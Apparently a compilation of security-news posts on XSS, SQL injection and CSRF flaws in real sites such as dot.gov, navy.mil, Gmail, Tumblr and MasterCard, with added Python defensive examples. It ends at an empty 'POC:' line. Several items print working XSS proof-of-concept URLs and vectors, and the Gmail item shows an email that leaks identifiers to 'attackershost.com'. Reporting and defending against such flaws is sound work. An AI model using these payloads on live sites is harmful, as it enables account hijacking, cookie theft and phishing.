U.S. Department of Transportation vulnerable to CSRF, SQLi and XSS

wiki boat brazil

The hacker group calling itself 'The Wiki Boat Brazil' has discovered three critical vulnerabilities in official websites of the U.S. Department of Transportation (dot.gov).

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request to the server; the victim's browser sends that request with the victim's own cookies attached.

The site was found to be vulnerable to a cross-site request forgery (CSRF) attack, and the hackers provided us with a proof of concept. The vulnerability allows an attacker to change a user account to admin if an administrator clicks a specially crafted link.
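The standard defence against the CSRF described above is a synchronizer token: a random secret tied to the administrator's session and embedded in the site's own forms, which a page on another origin cannot read and therefore cannot include in a forged request. The following Python is an added example, not code from dot.gov or from The Wiki Boat Brazil; the `csrf_token` form field, the `promote_user` action and the in-memory session and user dictionaries are constructed stand-ins for the real application.

```python
"""Minimal CSRF defence: a per-session synchronizer token checked on every
state-changing request. Added illustration; nothing here is the DOT site's code."""
import hmac
import secrets

TOKEN_FIELD = "csrf_token"  # hypothetical form field name


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) a random token bound to the server-side session.
    The server renders it into its own forms; a foreign page never sees it."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def is_request_authorized(session: dict, form: dict) -> bool:
    """A cross-site request carries the victim's cookies, so a valid session
    alone proves nothing about where the request came from. Require the
    token that only a form served by our own origin could have embedded."""
    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD)
    if not expected or not supplied:
        return False
    # constant-time comparison so the token cannot be guessed byte by byte
    return hmac.compare_digest(expected.encode(), supplied.encode())


def promote_user(session: dict, form: dict, users: dict) -> bool:
    """The privileged action from the article: change a user's role to admin.
    Succeeds only when the caller is an admin AND the request is CSRF-safe."""
    if session.get("role") != "admin":
        return False
    if not is_request_authorized(session, form):
        return False
    target = form.get("user")
    if target not in users:
        return False
    users[target] = "admin"
    return True


def demo() -> dict:
    """Constructed scenario: one admin session, a forged cross-site POST
    (cookies present, token absent) and a legitimate POST from our own form."""
    users = {"alice": "user", "bob": "user"}
    admin_session = {"role": "admin"}
    token = issue_csrf_token(admin_session)

    # request triggered from the attacker's page: the browser attaches the
    # admin's cookies, but the attacker cannot read the token to include it
    forged = {"user": "alice"}
    # request submitted through a form we rendered, which embedded the token
    legitimate = {"user": "bob", TOKEN_FIELD: token}

    return {
        "forged_accepted": promote_user(admin_session, forged, users),
        "legitimate_accepted": promote_user(admin_session, legitimate, users),
        "roles": dict(users),
    }


if __name__ == "__main__":
    print(demo())  # forged request rejected, legitimate one promotes bob
```

The token must be tied to the session and compared in constant time; a token that is the same for every user, or that is also stored in a cookie the attacker's request would carry automatically, gives no protection.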

They also discovered a SQL injection vulnerability in the ITS Deployment Statistics subdomain of the U.S. Department of Transportation (www.itsdeployment.its.dot.gov).

The Environmental Review Toolkit page (www.environment.fhwa.dot.gov) is vulnerable to a non-persistent cross-site scripting (XSS) attack.

They also leaked some data compromised from the Federal Highway Administration (www.fhwa.dot.gov).

A few days back, they attacked the Ministry of Finance and Federal Police sites in Brazil.

The details can be found here:
http://thewikiboatbrazil.com.br/DOT

XSS vulnerabilities have been fixed in Firefox 16.0.2

Mozilla has released updated versions of Firefox, Thunderbird and SeaMonkey that close three critical vulnerabilities related to the Location object.

Vulnerability details:
CVE-2012-4194:
The vulnerability allows an attacker to use the valueOf method, combined with some plugins, to perform an XSS attack on users.

CVE-2012-4195:
The CheckURL function of window.location can be forced to return the wrong calling document and principal, resulting in an XSS attack.

CVE-2012-4196:
Allows an outsider to bypass the security wrapper protections on the Location object, permitting cross-origin reading of the Location object.

The vulnerabilities have been fixed in Firefox 16.0.2, Firefox ESR 10.0.10, Thunderbird 16.0.2, Thunderbird ESR 10.0.10 and SeaMonkey 2.13.2.

Persistent XSS Vulnerability in 160By2


Hi, I've discovered a persistent cross-site scripting vulnerability in the 160by2 website, a popular site used for sending SMS.

Today, while I was sending a message to one of my friends from 160by2, my hacker mind started to work (after a long time). I inserted a script instead of a message. The message was sent successfully to the receiver.

 The inserted script:
     <script>alert("BreakTheSec")</script>


At the same time, 160by2 displayed the message sent by me in the Sent box. Yeah, the inserted script was executed and displayed the popup.

Whenever I visit the Sent box, the popup is displayed. In fact, the popup is displayed on the main page as well, because of the "LAST 5 MESSAGES SUMMARY" section on the home page.

I consider the risk level of this vulnerability very, very low because it only works when you are logged in. So it won't help attackers target victims.

XSS vulnerability found in Google "Translate foreign language" feature


A security researcher with the handle "PandaSec" has discovered a cross-site scripting (XSS) vulnerability in Google.

The "Translate foreign language" feature was found to be vulnerable to a non-persistent XSS attack.

The researcher tested the vulnerability in Firefox 14.0 and successfully exploited it. According to the researcher's statement, older versions were not affected.

He immediately reported the vulnerability to Google. Google replied with the following message: "Congratulations! This vulnerability is eligible for a reward of $500."

The vulnerability has now been fixed.

StumbleUpon vulnerable to Reflected Cross site scripting


A security researcher, Rafay Baloch, has discovered a cross-site scripting vulnerability in StumbleUpon, one of the most popular social bookmarking websites, with an Alexa rank of 149.

"A few days before, while I was hunting for vulnerabilities inside stumbleupon.com," Rafay said in his blog post, "Fiddler helped me obtain a non-persistent XSS vulnerability inside StumbleUpon."

He sent a notification about the vulnerability to StumbleUpon; however, there has been no response from the other side.

"For security reasons I cannot disclose the URL and parameters for the injection. I hope StumbleUpon fixes the vulnerability pretty soon," the researcher said.

At the time of writing, the vulnerability is not patched and we are able to exploit it. In fact, I injected a redirection code that successfully redirected me to the given URL. So an attacker can exploit this vulnerability to launch a social engineering attack and redirect users to a malicious site. It is also possible to hijack the session, which allows an attacker to take control of your StumbleUpon account.

A few days back, Rafay also discovered a redirection vulnerability in Facebook.

Reflected XSS vulnerability in Abdul Kalam's Website


A security researcher from India, Girish Shrimali, has discovered a cross-site scripting vulnerability in the official website of A. P. J. Abdul Kalam, the Indian scientist and administrator who served as the 11th President of India.

The discovered XSS vulnerability is of the reflected type, meaning it is non-persistent and is exploited via a crafted URL.

Normally, reflected XSS is considered low risk. Even though the risk level is estimated as low, attackers can use it to redirect users to phishing or other malicious sites.

POC:
http://www.abdulkalam.com/kalam/jsp/display_hints.jsp?menuid=22&menuname=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&starts=0&ends=0



SQL Injection and XSS vulnerability in Navy.mil



A grey-hat hacker has discovered critical SQL injection and cross-site scripting vulnerabilities in the official website of the U.S. Navy (navy.mil).

"Recently I was pentesting one of the navy.mil subdomains and found a serious SQL injection that allowed me to extract sensitive data from the website database. The SQL injection is located in the POST parameters of a form value. An attacker just needs to craft a valid query and submit it to the server," the hacker wrote in an email.


SQLi vulnerability

He also discovered two XSS vulnerabilities on the same subdomain, one a POST XSS and the other a GET XSS, both reflected.

"I have reported this to website security and I hope it will be resolved soon. After the fix I will disclose the link locations on my blog http://m4x0n3.blogspot.com/," the hacker said.

"Never trust user input," the hacker said as a message to webmasters.
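The defect class behind this report, a form value spliced into SQL text, and the hacker's closing advice both come down to one coding rule: pass user input to the database as a parameter, never as part of the statement. The following Python with SQLite is an added example and not the navy.mil application's code; the `personnel` table, its rows and column names are constructed, since the real schema is not disclosed. It shows the concatenated query returning the whole table for a tautology input while the parameterized query correctly returns nothing.

```python
"""Constructed SQLite demonstration: a POST value concatenated into SQL
versus the same lookup parameterized. Added example; the schema is invented."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows standing in for 'sensitive data'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE personnel (username TEXT, unit TEXT, clearance TEXT)")
    conn.executemany(
        "INSERT INTO personnel VALUES (?, ?, ?)",
        [("jsmith", "Fleet-1", "secret"), ("mlee", "Fleet-2", "confidential")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the statement from the submitted value. The value becomes part of
    the SQL grammar, so a quote inside it rewrites the query instead of the data."""
    sql = f"SELECT username, unit, clearance FROM personnel WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized: the driver sends the value separately from the statement
    text, so no input, whatever it contains, can alter the WHERE clause."""
    sql = "SELECT username, unit, clearance FROM personnel WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo() -> dict:
    """Run both lookups against a normal form value and a tampered one."""
    conn = make_db()
    normal = "jsmith"
    tampered = "nobody' OR '1'='1"  # constructed tautology, the textbook case
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        "vulnerable_tampered": len(lookup_vulnerable(conn, tampered)),  # whole table
        "safe_normal": len(lookup_safe(conn, normal)),
        "safe_tampered": len(lookup_safe(conn, tampered)),  # no such user: 0 rows
    }


if __name__ == "__main__":
    print(demo())
```

The same rule applies to every driver and ORM: the `?` (or `%s`, `:name`) placeholder is the only part of the API that keeps data and code separate; escaping quotes by hand is not a substitute.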

XSS vulnerability found in MasterCard site by NullCrew

The well-known hacker group NullCrew has discovered a non-persistent cross-site scripting (XSS) vulnerability in the official website of MasterCard. The "Mobile Payments Readiness" subdomain (mobilereadiness.mastercard.com) was found to be vulnerable to XSS.

http://mobilereadiness.mastercard.com/country-comparisons/index.php?c1=sg"><script>alert("NullCrew")</script>

Usually, non-persistent or reflected XSS is considered low risk. Even though the risk level is estimated as low, attackers can steal user accounts through social engineering attacks.

For instance, a hacker can redirect a victim to malicious or phishing sites by injecting a redirection script in the URL. I have tested the redirection script; it successfully redirected me to another site.

The above script redirects to Google. An attacker can send the crafted link and lure users into believing they are visiting the legitimate MasterCard site when, in fact, they are being redirected to a malicious site.


NullCrew has also discovered an XSS vulnerability on the Department of Homeland Security site.

Tumblr patched a critical persistent XSS vulnerability


A security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent cross-site scripting (XSS) vulnerability on Tumblr, the popular microblogging platform.

XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.

"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," the researcher said in the blog post.

"Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page."

The researcher found the vulnerability on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user created a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> would trigger an alert box displaying the user's cookie in the browser.

Tumblr was notified of the issue more than three weeks ago. They finally fixed the vulnerability today (July 14).
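The fix for this class of bug is output encoding for the HTML context the value lands in, and it can be checked mechanically: render the untrusted value, parse the result, and confirm that no tag or event handler originated from the value. The following Python is an added example and not Tumblr's, 160by2's or Gmail's code; the `render_app_row` template and the `_TagAudit` parser are constructed here, and the inputs are the vectors quoted in those three items of this page, so one block serves all of them.

```python
"""Context-aware output encoding plus a parser-based check that it worked.
Added example; the template and the audit are constructed, not Tumblr's code."""
import html
from html.parser import HTMLParser


def render_app_row(app_name: str) -> str:
    """Render an untrusted application name into a quoted attribute and a text
    node. html.escape(quote=True) encodes & < > " and ', so the value can
    neither close the attribute it sits in nor open a new tag."""
    safe = html.escape(app_name, quote=True)
    return f'<input type="text" name="app" value="{safe}"><span>{safe}</span>'


def render_app_row_unsafe(app_name: str) -> str:
    """The defective pattern the report describes: raw interpolation."""
    return f'<input type="text" name="app" value="{app_name}"><span>{app_name}</span>'


class _TagAudit(HTMLParser):
    """Records every start tag and every on* attribute a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.handlers: list = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(markup: str) -> dict:
    """Parse rendered markup and report the tags and event handlers it contains.
    A correctly encoded row contains only the template's own input and span."""
    parser = _TagAudit()
    parser.feed(markup)
    parser.close()
    return {"tags": parser.tags, "handlers": parser.handlers}


# constructed inputs: the three vectors quoted in the reports on this page
VECTORS = [
    'tester "><img src=\'x\' onerror="alert(document.cookie)"/>',  # Tumblr
    '<script>alert("BreakTheSec")</script>',                       # 160by2
    "<img src=x onerror=prompt(1)>",                               # Gmail subject
]


def demo() -> list:
    """For each vector, audit the raw rendering and the encoded rendering."""
    return [
        {
            "vector": v,
            "unsafe": audit(render_app_row_unsafe(v)),
            "safe": audit(render_app_row(v)),
        }
        for v in VECTORS
    ]


if __name__ == "__main__":
    for row in demo():
        print(row["vector"])
        print("  raw     :", row["unsafe"])   # extra img/script tags, onerror handlers
        print("  encoded :", row["safe"])     # only the template's input and span
```

Encoding is per context: the entity encoding shown here is right for attribute values and text nodes, but a value placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead, which is why "sanitizing on input" alone keeps failing.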

If you don't know what XSS is, you can read this article "Xss For Beginners".

XSS vulnerability found in Microsoft.com

A security researcher, Gambit, has discovered a cross-site scripting vulnerability in Microsoft's official website.

He found the vulnerability last month and reported the vulnerabilities to Microsoft.

"Well, last month I was looking around on MSN.com and Microsoft.com and I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page," Gambit said in his blog.


Microsoft listed his name on the 'Security Researcher Acknowledgments for Microsoft Online Services' page.

The 'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. The researcher managed to execute the XSS code on the page.


POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"

Google patched Persistent XSS vulnerabilities in Gmail


A security researcher, Nils Junemann, discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google a few months ago; Google has now patched the vulnerabilities.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view":

An incoming mail containing <img src=x onerror=prompt(1)> within the subject, when forwarded to another user, led to XSS.

The second one is a very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar

The third security issue is a very interesting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Junemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id. Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim a HTML e-mail with that content:
<img src="https://attackershost.com/1x1.gif">
<a href="https://attackershost.com/gmailxss">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to the attacker's server. The second URL will also leak that data if the user clicks on it. The script will then display a JavaScript alert, and that's the attacker's code running in the context of Gmail.

XSS Vulnerability found in 4 Antivirus websites



A security researcher, Ankit Sharma, has discovered cross-site scripting vulnerabilities in four antivirus websites.

The official websites of BitDefender, AVG, Avira and Total Defense Antivirus are vulnerable to XSS.



In BitDefender TrafficLight, the URL input is not filtered for XSS. The URL input allows hackers to run malicious XSS code, which can result in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E



XSS vulnerability found in more than 120 sites

Indian hacker Akshay discovered XSS vulnerabilities in more than 100 websites and listed the POCs on TinyPaste.

The vulnerable sites include IndiaTimes, wikia.com, Seagate and PlacementIndia. After analyzing the paste, most of the sites are subdomains of the Wikia website.

Some other sites vulnerable to XSS attack are dialabook.in, junglee.com, antya.com, t3.com and independent.co.uk.

In the past, he has found XSS vulnerabilities in a lot of high-profile sites.

http://pastebin.com/tLXTZDvP

JustDial, In.Com, Rediff, eBay and other sites vulnerable to XSS


A hacker calling himself "5p1K3 BO7" found cross-site scripting vulnerabilities in some high-profile sites. The list of vulnerable sites includes Airtel, eBay, JustDial, Rediff and NavBharatTimes.

He also found XSS vulnerabilities in the following sites: rovio.com, moneycontrol.com, In.Com, the Reliance site, m.mytatasky.com, dinaralert.webs.com and domestichotels.yatra.com.

XSS vulnerability found in 60 high profile sites by Akshay AKA 0z0n3

Akshay AKA 0z0n3 has discovered cross-site scripting vulnerabilities in around 60 high-profile websites.

The list of vulnerable sites with screenshots:
1. http://www.ipchecking.com - snap - http://4.bp.blogspot.com/-sXxLSZjS-YA/T3r6jzFEJxI/AAAAAAAAAQU/9KO2PSZjVNA/s640/ipchecking.PNG
2. http://www.hostip.info/ - snap - http://2.bp.blogspot.com/-1frOtWxbyWQ/T3rm4InsqxI/AAAAAAAAAQM/CC2oPWpAwUA/s640/host.PNG
3. http://buzzr.in/ - snap - http://4.bp.blogspot.com/-RrW1-tkGoYI/T3me0_BFAuI/AAAAAAAAAP0/-BPrIYpJNd0/s640/buzzer.in.PNG
4. http://www.jabong.com/ - snap - http://2.bp.blogspot.com/-h-NRz0x9r8U/T3meRO0ttjI/AAAAAAAAAPs/lsfHV7E6hFQ/s640/jabong.PNG
5. http://www.infibeam.com/ - snap - http://1.bp.blogspot.com/-XzpThsTvM1o/T3mc184ZwBI/AAAAAAAAAPc/lDcc4ICW8Z0/s640/infi.PNG
6. http://govasool.com/ - snap - http://4.bp.blogspot.com/-IhPt_piUZNE/T3mcGznGWFI/AAAAAAAAAPU/_cUNqu51qJI/s640/govasool.PNG
7. http://www.bestpricebid.com/ - snap - http://4.bp.blogspot.com/-sRLF50gx5qo/T3mbjos3_WI/AAAAAAAAAPM/eRCuvlO_hSc/s640/bestpricebid.PNG
8. discovery.com - snap - http://3.bp.blogspot.com/-LuPNagueW-4/T3hUApqubkI/AAAAAAAAAOs/B13FADXhFv8/s640/Capture.PNG
9. pocketgamer.co.uk - snap - http://4.bp.blogspot.com/--7LLdA1-QeU/T3hNmJ4sPFI/AAAAAAAAAOg/NRqr8fgUwsE/s640/povket+gamer.PNG
10. zdnet.com (patched) - snap - http://4.bp.blogspot.com/-L2EztX0qh7w/T3g3DlxXMtI/AAAAAAAAAOM/qMaWRUmF0zY/s640/zdnet.PNG
11. 1up.com - snap - http://imgur.com/uc5y3
12. astrologer.rediff.com - snap - http://i49.tinypic.com/2q8pzqa.png
13. LIC - snap - http://i45.tinypic.com/hx3ek3.png
14. http://warebuzz.com - snap - http://1.bp.blogspot.com/-0rrctaNpS1g/T3gKU52H9sI/AAAAAAAAAN0/NgEEHOy1JJo/s640/ware+buzz.PNG
15. http://www.thedownloadplanet.com - snap - http://2.bp.blogspot.com/-A90-Cs4O2Ow/T3gJY0PwYTI/AAAAAAAAANs/X3YRb8l_-8E/s640/download+planet.PNG
16. http://md5-decrypter.com - snap - http://1.bp.blogspot.com/-wYTXo9rjxdI/T3brfaNUrdI/AAAAAAAAANc/aHu9oAVN4uo/s640/md5-decrypter.PNG
17. http://www.shiksha.com - snap - http://3.bp.blogspot.com/-DE8esm6LDi0/T3bhpjsEExI/AAAAAAAAANU/ooJCO2CIur8/s640/shiksha.PNG
18. http://www.scholastic.com - snap - http://1.bp.blogspot.com/-sFeKT9dyi5A/T3W-JAsfTII/AAAAAAAAANM/zLYTpg_zAZ4/s640/scholastic.PNG
19. http://www.indiatrace.com - snap - http://4.bp.blogspot.com/-Pdkg39UIVLQ/T3W1bF-LK7I/AAAAAAAAANE/O1Lp-3oEndA/s640/Capture.PNG
20. http://www.americanregistry.com - snap - http://1.bp.blogspot.com/-hs2fIRZsgAI/T3VpB4S9wnI/AAAAAAAAAMs/E0lBuFawamc/s640/american.PNG
21. http://www.stockpricetoday.com - snap - http://4.bp.blogspot.com/-drwR5vn2yuY/T3VoHExfzEI/AAAAAAAAAMk/6NRzeUEHMGY/s640/stock+price.PNG
22. http://www.trdefence.com - snap - http://4.bp.blogspot.com/-DDNU3wRnS-k/T3VmNQAmvwI/AAAAAAAAAMc/Pa1-0gAKWa4/s640/turkey+defense.PNG
23. http://industry.net/ - snap - http://1.bp.blogspot.com/-jz5Qprco2l8/T3ViZ8auwDI/AAAAAAAAAMM/fbSHyu34DyM/s640/industry.net.PNG
24. http://www.bdtradeinfo.com - snap - http://4.bp.blogspot.com/-ssrm58lR7Y0/T3SGg5pyVxI/AAAAAAAAALk/PSQdV4_9YQE/s640/bdtradeinfo.PNG
25. dealsandyou.com - snap - http://1.bp.blogspot.com/-PmgIo4Inb8g/T3MTmGEheBI/AAAAAAAAALM/HwKAWSXRMAg/s640/deals+and+you.PNG
26. 100bestbuy.com - snap - http://2.bp.blogspot.com/-VpZiQkWQH2Y/T3MSwjfKElI/AAAAAAAAALE/y30pSYfrwrQ/s640/100+best+buy.PNG
27. chennai.burrp.com - snap - http://4.bp.blogspot.com/-YRKuTsUhN6U/T3LrzpQZ2jI/AAAAAAAAAKg/5Gi2Ww225J4/s640/burrp+2.PNG
28. bangalore.burrp.com - snap - http://2.bp.blogspot.com/-Wo3a1kI29ZI/T3LqgRre7jI/AAAAAAAAAKY/V0QsT2s60I4/s640/burp+banglore.PNG
29. http://www.proxysites.com - snap - http://3.bp.blogspot.com/-yiJQdIQI8nw/T3Lp-Drl-KI/AAAAAAAAAKQ/-QzKBTpXAp4/s640/proxy+site.PNG
30. http://vertor.com - snap - http://3.bp.blogspot.com/-AGl5bbo-d3M/T3HhwS0GX2I/AAAAAAAAAKI/OvrpwMYYlMQ/s640/vertor.PNG
31. https://torrentprivacy.com - snap - http://2.bp.blogspot.com/-Ksa-FQtAiXg/T3HgB10v5_I/AAAAAAAAAKA/4RBWC1tYO-k/s640/privacy.PNG
32. www.yifytorrents.com - snap - http://2.bp.blogspot.com/-KPCn5bldif8/T3HWLfWyUPI/AAAAAAAAAJw/2zDLbbttZAY/s640/yify.PNG
33. saavn.com - snap - http://4.bp.blogspot.com/-N1Yvg1yR4BU/T3HI_zKr9zI/AAAAAAAAAJg/IJgRFT2wMHw/s640/saa.PNG
34. www.arabianbusiness.com - snap - http://2.bp.blogspot.com/-ngUEyIWkd7Q/T3GvlQ0sjmI/AAAAAAAAAJY/ZrLBull5om8/s640/arabian.PNG
35. velocity.discovery.com - snap - http://4.bp.blogspot.com/-3vFAtzIfnoA/T3GqX6mj0II/AAAAAAAAAJQ/AXLIAQ6ss_c/s640/velocity.PNG
36. science.discovery.com - snap - http://1.bp.blogspot.com/-ygi6RWwm4r8/T3GqI1LSJyI/AAAAAAAAAJI/A_NvDMps6nw/s640/science.+disco.PNG
37. planetgreen.discovery.com - snap - http://1.bp.blogspot.com/-CuI8fyW1JGQ/T3Gp335-xtI/AAAAAAAAAJA/rKMVzco1IBM/s640/planet+green.PNG
38. investigation.discovery.com - snap - http://4.bp.blogspot.com/-qnWsvSYY8YQ/T3GpdqVeU-I/AAAAAAAAAI4/_9QxkpUTLho/s640/investigation+disco.PNG
39. health.discovery.com - snap - http://4.bp.blogspot.com/-p0wnXa1elEA/T3GpB0aBk7I/AAAAAAAAAIw/a9ZhyEQu4Yc/s640/health+disco.PNG
40. animal.discovery.com - snap - http://4.bp.blogspot.com/-1Hzcu--hP_s/T3GosmdYnvI/AAAAAAAAAIo/Z3KmcFmyw4Y/s640/animal+planet.PNG
41. brothersoft.com - snap - http://4.bp.blogspot.com/-M9esX8gICt0/T3GbKJ-z5kI/AAAAAAAAAIY/DMm0KQEVJwI/s640/brother+soft.PNG
42. http://www.emp3world.com - snap - http://1.bp.blogspot.com/-V8S_UBtNMbw/T3GO2V0qTHI/AAAAAAAAAIM/k-1CIzVcOps/s640/emp3.PNG
43. www.malabargold.com - snap - http://1.bp.blogspot.com/-dMap3sAvV5o/T3B8aHgBKdI/AAAAAAAAAHw/7IzjV4PL144/s640/malabar.PNG
44. www.tanishq.com - snap - http://3.bp.blogspot.com/-EDfBzzJz8iQ/T3B7_16FClI/AAAAAAAAAHo/7W3OBxylZd4/s640/tanishq.PNG
45. http://www.ecb.co.uk - snap - http://3.bp.blogspot.com/-ouWqcIl-6as/T3BwabPqpjI/AAAAAAAAAHg/GDSXL9brJ4c/s640/british.PNG
46. http://www.premierleague.com - snap - http://4.bp.blogspot.com/-7bPcLU0GHw4/T3BrJKI_FLI/AAAAAAAAAHQ/VWVYLw0Nmj0/s640/premier.PNG
47. http://www.cricket.com.au - snap - http://1.bp.blogspot.com/-YmGHDgXCq3M/T3BuAVdhJ5I/AAAAAAAAAHY/kX1_YFZ4VCU/s640/kabarroo.PNG
48. http://www.rapidsharedata.com - snap - http://2.bp.blogspot.com/-mJPoTJVcMic/T3Boa6CFxKI/AAAAAAAAAHI/uPfCqNLo8Qk/s640/rapidshare.PNG
49. www.whatsmyip.com - snap - http://2.bp.blogspot.com/-GzjF_oq33w4/T3A1jMzlRVI/AAAAAAAAAGY/50ntkVG3xos/s640/whatsmy+ip.PNG
50. http://eztv.it - snap - http://4.bp.blogspot.com/-JgMf3qZ9kRo/T27Gi34a61I/AAAAAAAAAFo/9JyXqalNmEM/s640/eztv.PNG
51. http://www.indiaplaza.com - snap - http://2.bp.blogspot.com/-K6izMAgd_ik/T3AcfP2oDpI/AAAAAAAAAGA/yDY-RE8kGW8/s640/india+plaza.PNG
52. asiagamespot.com - snap - http://1.bp.blogspot.com/-cToR0vSQ09Q/T29DkeFu6_I/AAAAAAAAAF4/OLUP0y-jUms/s640/gamespot.PNG
53. http://dunyanews.tv - snap - http://1.bp.blogspot.com/-OouHLv17uwU/T262ogNVDZI/AAAAAAAAAFg/FkVc83KjMp0/s640/pk+news.PNG
54. http://thetwilightsaga.com - snap - http://1.bp.blogspot.com/-5xQCtPSXvQs/T230n1BvqPI/AAAAAAAAAFY/DykhfJN-03I/s640/twilight.PNG
55. https://secure.wsj-asia.com - snap - http://1.bp.blogspot.com/-YfbSmQUp4VQ/T23gKloKEKI/AAAAAAAAAFQ/K-hecZghSEU/s640/wallstreet.PNG
56. expedia.co.in - snap - http://1.bp.blogspot.com/-FIyU9Zz7ik4/T23TB3x7NzI/AAAAAAAAAE8/1l5awVK2HjQ/s640/expedia.PNG
57. http://www.indiainfoline.com - snap - http://2.bp.blogspot.com/-dnZtvmIk44M/T23Qykr8zVI/AAAAAAAAAE0/HuQM6Q1ULfY/s640/iifl.PNG
58. http://www.palestinechronicle.com - snap - http://3.bp.blogspot.com/-iJjcuBwsbqs/T22dno4ma7I/AAAAAAAAAEM/zKOReV8JlQY/s640/Caapture.PNG
59. http://thesims2.ea.com - snap - http://4.bp.blogspot.com/-qPQRpgXJLsI/T2yoEKsYiGI/AAAAAAAAAD4/QQRoOHrs8Ek/s640/C+apture.PNG
60. olx.in - snap - http://3.bp.blogspot.com/-fpt0DzwwZKA/T22-M-6T2nI/AAAAAAAAAEk/PQkFW91TsO4/s640/olx.PNG

Akshay AKA 0z0n3 claims he found an XSS vulnerability in Blogspot


Akshay AKA 0z0n3 claimed that he has discovered a persistent XSS vulnerability in blogspot.com. He managed to inject the XSS vector in his own Blogger dashboard. He is sure it is not the template page (templates usually allow bloggers to inject scripts).

He used one of the following XSS vectors:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

After injecting, he didn't get a pop-up at first, but after some minutes he started getting pop-ups. He reported the vulnerability to the Google Security team. The vulnerability was not rewarded by Google.


"Thank you for your note. We took a look at the XSS issue you reported. Unfortunately, the XSS issue is executing on the blogspot domain and not blogger.com. We cover some of these scenarios here.

http://www.google.com/about/company/rewardprogram.html#javascript-blogger

Unfortunately, XSS issues on blogspot (as opposed to blogger.com) do not qualify for the VRP. If you manage to execute this JavaScript on someone else's blog or on the blogger.com domain, that would qualify for a reward," reads Google's response mail.

XSS vulnerability found in Russia's biggest social network, odnoklassniki.ru

Grey-hat hackers Sony and Flexxpoint have discovered an interesting cross-site scripting vulnerability in Odnoklassniki. Odnoklassniki (Одноклассники in Russian, "Classmates") is a social networking service for classmates and old friends, popular in Russia and other former Soviet republics. It was created by Albert Popkov on March 4, 2006.

They provided the vulnerable link and a video to demonstrate the vulnerability:

http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E

Screenshot
In order to verify the vulnerability, you have to log in, because the page is available only to logged-in users.

POC video:




Cross Site Scripting vulnerability found in Radikal.ru

Grey-hat hacker "Sony" has discovered a cross-site scripting (XSS) vulnerability in Radikal.ru. Radikal.ru is one of Russia's largest image hosting services; it allows you to quickly publish photos to various chat rooms, message boards, blogs and online forums.

He found XSS vulnerabilities in multiple pages.

Here is one of the vulnerable links:

http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1

Screenshot

In order to see the other vulnerabilities, you have to log in to the website. The vulnerability resides in Edit pics, etc.

XSS vulnerability in Amazon website, found by Fabian Cuchietti

Security researcher Fabian Cuchietti discovered an XSS vulnerability in Amazon Web Services (aws.amazon.com).

POC:
